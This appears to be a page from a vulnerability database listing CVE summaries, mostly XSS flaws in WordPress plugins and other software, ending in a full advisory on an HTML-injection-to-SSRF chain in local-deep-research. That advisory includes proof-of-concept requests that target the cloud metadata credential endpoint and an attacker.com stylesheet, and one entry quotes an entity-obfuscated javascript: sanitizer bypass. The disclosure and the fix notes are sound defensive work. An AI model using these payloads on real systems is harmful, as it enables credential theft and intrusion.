Stored XSS in LifePress WordPress plugin allows unauthenticated remote attackers to inject malicious scripts that execute in administrator contexts when viewing the plugin's settings page. The vulnerability affects all versions through 2.2.2 and stems from a publicly-accessible AJAX endpoint (lp_update_mds) that lacks both nonce verification and capability checks, combined with improper input sanitization of the 'n' parameter. The CVSS score of 7.2 reflects network-based exploitation requiring no authentication or user interaction, with changed scope enabling cross-context attacks. EPSS and KEV data not available; exploitation probability depends on attacker knowledge of the specific AJAX action endpoint.

XSS WordPress
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in AzonPost WordPress plugin versions up to 1.3 allows unauthenticated attackers to inject arbitrary JavaScript via the `editpos_hidden` parameter, executing in the browsers of administrators who click malicious links. The vulnerability stems from insufficient input sanitization and output escaping, requiring user interaction but affecting all versions of the plugin without requiring authentication or special configuration.

XSS WordPress
NVD
EPSS 0% CVSS 4.9
MEDIUM This Month

Stored Cross-Site Scripting (XSS) in WP SEO Structured Data Schema plugin for WordPress versions up to 2.8.1 allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript via the `_kcseo_ative_tab` parameter, which executes in the browsers of users viewing affected pages. The vulnerability stems from insufficient input sanitization and output escaping in the plugin's metadata handling. No public exploit code or active exploitation has been identified at time of analysis.

XSS WordPress
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored cross-site scripting in the Bootstrap Shortcode plugin for WordPress allows authenticated attackers with Contributor-level access to inject arbitrary JavaScript into pages via the `box` shortcode, executing malicious scripts whenever users view affected pages. The vulnerability exists in all versions up to 1.0 due to insufficient input sanitization and output escaping. No public exploit code or active exploitation has been identified at this time.

XSS WordPress Bootstrap
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored Cross-Site Scripting in Fancy Image Show plugin for WordPress up to version 9.1 allows authenticated contributors and above to inject arbitrary JavaScript via the `fancy-img-show` shortcode due to insufficient input sanitization and output escaping. The injected scripts execute in the context of any user viewing the affected page, affecting site integrity and potentially compromising administrative accounts. No public exploit code or active exploitation has been confirmed at time of analysis.

XSS WordPress
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

Reflected Cross-Site Scripting in Pricing Tables for WP plugin allows unauthenticated attackers to inject arbitrary JavaScript via the 'page' parameter. The vulnerability affects all versions up to 1.1.0 due to insufficient input sanitization and output escaping. Exploitation requires social engineering (e.g., tricking an administrator into clicking a malicious link), but no public exploit code or active exploitation has been identified at time of analysis.

XSS WordPress
NVD
EPSS 0% CVSS 6.4
MEDIUM This Month

Stored cross-site scripting in Shortcodely WordPress plugin versions up to 1.0.1 allows authenticated contributors and above to inject arbitrary JavaScript into pages via the 'widget_area' parameter, with scripts executing whenever users access affected pages. The vulnerability stems from insufficient input sanitization and output escaping, affecting all installations with vulnerable plugin versions active. CVSS 6.4 reflects the cross-site scope and information disclosure potential, though exploitation requires authenticated contributor-level access.

XSS WordPress
NVD
EPSS 0% CVSS 6.1
MEDIUM This Month

SAP Business Server Pages TAF_APPLAUNCHER contains a cross-site scripting vulnerability that allows unauthenticated attackers to craft malicious links redirecting users to attacker-controlled sites, potentially exposing or altering sensitive information. The vulnerability requires user interaction (clicking the link) and affects confidentiality and integrity with a CVSS score of 6.1. No active exploitation has been publicly confirmed at time of analysis.

XSS SAP
NVD
EPSS 0% CVSS 4.7
MEDIUM This Month

Reflected cross-site scripting (XSS) in SAP NetWeaver Application Server ABAP (Business Server Pages) allows unauthenticated attackers to inject malicious scripts via unprotected URL parameters. Successful exploitation requires victim interaction (clicking a crafted link) and affects confidentiality and integrity of application data. No public exploit code or active exploitation reported at time of analysis.

XSS SAP
NVD VulDB
EPSS 0% CVSS 5.4
MEDIUM This Month

Stored cross-site scripting (XSS) in FluentCMS 1.2.3 File Management module allows authenticated administrators to upload SVG files with embedded malicious JavaScript that executes when any user-including unauthenticated visitors-accesses the image URL directly. The vulnerability has public proof-of-concept code available via GitHub pull request, and CISA SSVC framework confirms exploitability is feasible but requires user interaction and is not automatable. CVSS 5.4 reflects the attack complexity introduced by authentication requirement and user interaction, but the cross-origin scope and ability to affect multiple users elevates real-world risk.

XSS
NVD GitHub
EPSS 0% CVSS 9.3
CRITICAL PATCH Act Now

DeepChat is an open-source artificial intelligence agent platform that unifies models, tools, and agents. Prior to v1.0.4-beta.1, a Cross-Site Scripting (XSS) vulnerability exists due to a discrepancy between the backend validation layer and the frontend browser rendering engine. The SVGSanitizer (src/main/lib/svgSanitizer.ts) restricts script execution by scrubbing javascript: protocols using plain-text regular expressions. However, it fails to account for HTML entity decoding prior to Vue's v-html DOM insertion inside the SvgArtifact.vue component. By feeding an SVG artifact with obfuscated entities (e.g., j&#x61;vascript:alert(1)), an attacker can completely bypass the sanitizer, culminating in arbitrary JavaScript execution when a victim interacts with the rendered SVG Element. This vulnerability is fixed in v1.0.4-beta.1.

XSS Deepchat
NVD GitHub
EPSS 0% CVSS 7.3
HIGH PATCH This Week

Outline is a service that allows for collaborative documentation. From 0.84.0 to 1.6.1, the Outline comment section permits users to mention other users; however, the backend does not validate or sanitize the href attribute associated with these mentions. As a result, potentially dangerous protocols (e.g., javascript:) are not filtered, introducing a risk of client-side code execution. This vulnerability is fixed in 1.7.0.

XSS RCE Outline
NVD GitHub
EPSS 0% CVSS 4.3
MEDIUM PATCH This Month

The issue was addressed with improved UI handling. This issue is fixed in iOS 26.5 and iPadOS 26.5, macOS Tahoe 26.5, visionOS 26.5. A malicious iframe may use another website’s download settings.

XSS Apple
NVD VulDB
EPSS 0% CVSS 4.5
MEDIUM PATCH This Month

Stored cross-site scripting (XSS) in Audiobookshelf prior to 2.33.0 allows authenticated administrators to inject malicious HTML and JavaScript into the authLoginCustomMessage field via the /api/auth-settings endpoint, which is then rendered on the login page for all users without sanitization. This enables attackers with admin credentials to capture user credentials, perform account takeover, or redirect users to phishing sites. No public exploit code identified at time of analysis.

XSS Audiobookshelf
NVD GitHub
EPSS 0% CVSS 7.5
HIGH PATCH This Week

Using *show_inline=1* parameter and a valid *file_show_inline_token* CSRF token on file_download.php, an attacker can execute code by uploading a crafted XHTML attachment referencing a JavaScript attachment. ### Impact Cross-site scripting ### Patches - 26647b2e68ba30b9d7987d4e03d7a16416684bc2 ### Workarounds None ### Credits Thanks to siunam (Tang Cheuk Hei) for discovering and responsibly reporting the issue.

XSS PHP CSRF
NVD GitHub VulDB
EPSS 0% CVSS 8.6
HIGH PATCH This Week

Unescaped Project Name allows an attacker that can set it (which typically requires manager or administrator access level) to inject HTML in Move Attachments admin page. ### Impact Cross-site scripting (XSS). This is mitigated by Content Security Policy which restricts scripts execution. ### Patches - 5cb4b469295889f5d2b01677c9bf82c143e0fdaa ### Workarounds None

XSS
NVD GitHub VulDB
EPSS 0% CVSS 5.0
MEDIUM PATCH This Month

## Summary `PDFService._markdown_to_html()` constructs an HTML document by interpolating user-controlled values - specifically `title` (sourced from `research.title` or `research.query`) and `metadata` key-value pairs - directly into an f-string without any HTML escaping. An authenticated attacker can craft a research query containing HTML special characters to inject arbitrary HTML tags into the document processed by WeasyPrint during PDF export. This injection can be chained to trigger a Server-Side Request Forgery (SSRF), bypassing the application's existing SSRF defenses in `ssrf_validator.py`. --- ## Details **Vulnerable code:** `src/local_deep_research/web/services/pdf_service.py`, lines 171-176 ```python # pdf_service.py:171-176 if title: html_parts.append(f"<title>{title}</title>") # ← title is not escaped if metadata: for key, value in metadata.items(): html_parts.append(f'<meta name="{key}" content="{value}">') # ← key/value are not escaped ``` **Data flow trace:** ``` User input: research.query │ ▼ research_routes.py:1321 pdf_title = research.title or research.query │ ▼ research_routes.py:1325-1326 export_report_to_memory(report_content, format, title=pdf_title) │ ▼ pdf_service.py:107 PDFService.markdown_to_pdf(markdown_content, title=pdf_title) │ ▼ pdf_service.py:137 _markdown_to_html(markdown_content, title, metadata) │ ▼ pdf_service.py:172 f"<title>{title}</title>" ← injection point, no escaping │ ▼ pdf_service.py:112 HTML(string=html_content) ← WeasyPrint renders the injected HTML ``` `research.query` is a string submitted by the user via `POST /api/start_research`, stored as-is in the database, and retrieved without any sanitization. When the user triggers `POST /api/v1/research/<research_id>/export/pdf`, this value is embedded unescaped into the HTML document processed by WeasyPrint. **Injection point 1: `<title>` tag breakout** ``` Input: </title><img src="http://169.254.169.254/latest/meta-data/" /> Rendered: <title></title><img src="http://169.254.169.254/latest/meta-data/" /></title> ``` When WeasyPrint encounters the injected `<img>` tag, it issues an HTTP GET request to the value of `src` by default. **Injection point 2: `<meta>` attribute breakout** ``` Input: " /><link rel="stylesheet" href="http://attacker.com/evil.css Rendered: <meta name="..." content="" /><link rel="stylesheet" href="http://attacker.com/evil.css"> ``` WeasyPrint will fetch and apply the external stylesheet, which also constitutes SSRF. --- ## Proof of Concept **Step 1: Log in and submit a research query containing the injection payload** ```http POST /api/start_research HTTP/1.1 Host: localhost:5000 Content-Type: application/json Cookie: session=<valid_session> { "query": "</title><img src=\"http://169.254.169.254/latest/meta-data/iam/security-credentials/\" onerror=\"x\"/>", "mode": "quick", "model_provider": "OLLAMA", "model": "llama3" } ``` The response returns a `research_id`, e.g. `"aaaa-bbbb-cccc-dddd"`. **Step 2: After the research completes, trigger PDF export** ```http POST /api/v1/research/aaaa-bbbb-cccc-dddd/export/pdf HTTP/1.1 Host: localhost:5000 Cookie: session=<valid_session> X-CSRFToken: <csrf_token> ``` **Step 3: Intermediate HTML constructed server-side** ```html <!DOCTYPE html><html><head> <meta charset="utf-8"> <title></title><img src="http://169.254.169.254/latest/meta-data/iam/security-credentials/" onerror="x"/></title> </head><body> ...report content... </body></html> ``` **Step 4: WeasyPrint issues an outbound HTTP request to the injected URL** Observed in network monitoring (e.g. `tcpdump`) or the target internal service logs: ``` GET /latest/meta-data/iam/security-credentials/ HTTP/1.1 Host: 169.254.169.254 User-Agent: WeasyPrint/... ``` **Lightweight verification (no SSRF environment required):** Set the query to: ``` </title><title>INJECTED ``` The resulting HTML will contain two `<title>` tags and the PDF document metadata title will read `INJECTED`, confirming successful injection. --- ## Impact ### 1. Chained SSRF (High Severity) By injecting `<img src>`, `<link href>`, or `<style>@import url()` tags pointing to internal addresses, WeasyPrint will issue HTTP requests on behalf of the server during PDF generation. This allows access to: - **Cloud metadata services** (`169.254.169.254`) on AWS, GCP, or Azure - enabling theft of IAM credentials and instance identity documents. - **Internal network services** (`192.168.x.x`, `10.x.x.x`) - enabling reconnaissance and interaction with internal APIs not exposed to the internet. - **Localhost administrative interfaces** - if SSRF protections are only applied at the user-input validation layer. This is an effective bypass of the application's existing SSRF defenses in `ssrf_validator.py`, because WeasyPrint's outbound resource requests are never routed through that validator. ### 2. HTML Document Structure Corruption Injected tags can prematurely close `<head>` and insert arbitrary content into `<body>`, causing WeasyPrint to render incorrectly or crash, resulting in a Denial of Service (DoS) condition for the export functionality. ### 3. CSS Injection (Medium Severity) By injecting `<link>` or `<style>` tags that load external stylesheets, an attacker can fully control the visual content of the generated PDF, enabling report content forgery or spoofing. ### 4. Affected Scope - All PDF export operations are affected. - The vulnerability is reachable by any authenticated user - no elevated privileges required. - Because each user operates against their own encrypted database, cross-user exploitation is not possible. However, on any shared or multi-tenant deployment, every authenticated user can independently trigger this vulnerability. --- ## Remediation Apply `html.escape()` to all user-controlled values before embedding them in the HTML template inside `_markdown_to_html`: ```python import html if title: html_parts.append(f"<title>{html.escape(title)}</title>") if metadata: for key, value in metadata.items(): html_parts.append( f'<meta name="{html.escape(str(key))}" content="{html.escape(str(value))}">' ) ``` Additionally, consider configuring WeasyPrint with a custom `url_fetcher` that blocks or restricts outbound HTTP requests to prevent SSRF via injected or legitimately-embedded external resources: ```python def safe_url_fetcher(url, timeout=10): from ssrf_validator import validate_url if not validate_url(url): raise ValueError(f"Blocked unsafe URL in PDF rendering: {url}") return weasyprint.default_url_fetcher(url, timeout=timeout) html_doc = HTML(string=html_content, url_fetcher=safe_url_fetcher) ``` --- *Report generated against commit `f3540fb3` - local-deep-research, branch `main`.* --- ## Maintainer note (2026-04-24) Thanks @Firebasky for the detailed report. The complete remediation spans two PRs, both merged to `main`: **#3082** (merged 2026-03-29, shipped in **v1.5.0+**) - closes the HTML-injection sinks: - `html.escape()` now wraps the `title` value in `<title>…</title>` - Same for metadata keys/values in `<meta name="…" content="…">` - Regression tests added in `tests/web/services/test_pdf_service.py` **#3613** (merged 2026-04-24, shipped in **v1.6.0**) - implements the `url_fetcher` recommendation from the Remediation section: - New `_safe_url_fetcher` in `pdf_service.py` delegates to `weasyprint.default_url_fetcher` only after `security.ssrf_validator.validate_url` accepts the URL - Blocks AWS metadata (169.254.169.254), RFC1918, loopback, and non-http(s) schemes - Covers the chained SSRF path through any URL reaching the rendered HTML - markdown body, citations, raw-HTML passthrough via Python-Markdown - Blocked URLs raise `UnsafePDFResourceURLError` (a `ValueError` subclass) so WeasyPrint skips the resource and the render continues - 8 regression tests, including an end-to-end render with `<img src="http://169.254.169.254/…">` embedded in the body **Advisory metadata:** CVSS `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:N/A:N` (5.0 Moderate), CWEs **CWE-79** + **CWE-918**. **Patched in v1.6.0** - upgrade to v1.6.0 or later to receive both fixes.

Denial Of Service SSRF Microsoft +2
NVD GitHub VulDB
Prev Page 18 of 432 Next

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy